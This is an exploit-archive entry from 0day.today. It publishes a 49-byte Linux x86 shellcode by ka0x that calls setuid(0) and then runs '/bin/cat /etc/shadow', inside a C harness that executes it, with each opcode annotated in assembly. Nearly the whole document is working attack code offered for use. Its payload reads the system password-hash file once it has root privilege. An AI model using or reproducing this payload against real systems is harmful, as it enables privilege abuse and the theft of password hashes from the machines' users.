linux/x86 setuid(0) & execve(/bin/cat /etc/shadow) 49 bytes

2009-12-04T00:00:00
ID 1337DAY-ID-9830
Type zdt
Reporter ka0x
Modified 2009-12-04T00:00:00

Description

Exploit for linux/x86 platform in category shellcode

                                        
                                            ===========================================================
linux/x86 setuid(0) & execve(/bin/cat /etc/shadow) 49 bytes
===========================================================


#include <stdio.h>
 
/*
    linux/x86 ; setuid(0) & execve(/bin/cat /etc/shadow) 49 bytes
    written by ka0x 
    lun sep 21 16:40:16 CEST 2009
 
*/
 
int main()
{
    char shellcode[] =
            "\x31\xdb"      // xor ebx,ebx
            "\x6a\x17"      // push byte 17h   
            "\x58"          // pop eax
            "\xcd\x80"      // int 0x80
            "\x8d\x43\x0b"      // lea eax,[ebx+0xb]
            "\x99"          // cdq
            "\x52"          // push edx
            "\x68\x2f\x63\x61\x74"  // push dword 0x7461632f
            "\x68\x2f\x62\x69\x6e"  // push dword 0x6e69622f
            "\x89\xe3"      // mov ebx,esp
            "\x52"          // push edx
            "\x68\x61\x64\x6f\x77"  // push dword 0x776f6461
            "\x68\x2f\x2f\x73\x68"  // push dword 0x68732f2f
            "\x68\x2f\x65\x74\x63"  // push dword 0x6374652f
            "\x89\xe1"      // mov ecx,esp
            "\x52"          // push edx
            "\x51"          // push ecx
            "\x53"          // push ebx
            "\x89\xe1"      // mov ecx,esp
            "\xcd\x80" ;        // int 80h
 
    printf("[*] ShellCode size (bytes): %d\n\n", sizeof(shellcode)-1 );
    (*(void(*)()) shellcode)();
     
    return 0;
}


#  0day.today [2018-01-05]  #